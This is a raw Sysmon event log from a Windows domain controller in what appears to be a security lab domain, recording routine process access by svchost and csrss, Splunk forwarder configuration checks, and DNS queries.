13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5B00-000000009101}2456C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8553-5FCF-5A00-000000009101}40442672C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8553-5FCF-5B00-000000009101}2456C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.735{10ACEC4A-8553-5FCF-5B00-000000009101}2456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8553-5FCF-5A00-000000009101}4044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5A00-000000009101}4044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8553-5FCF-5A00-000000009101}4044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8553-5FCF-5A00-000000009101}4044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.730{10ACEC4A-8553-5FCF-5A00-000000009101}4044C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.680{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8553-5FCF-5900-000000009101}2920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.680{10ACEC4A-8553-5FCF-5900-000000009101}29202824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.984{10ACEC4A-853E-5FCF-0B00-000000009101}864win-dc-935010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.983{10ACEC4A-8551-5FCF-2E00-000000009101}2212win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.430{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5900-000000009101}2920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 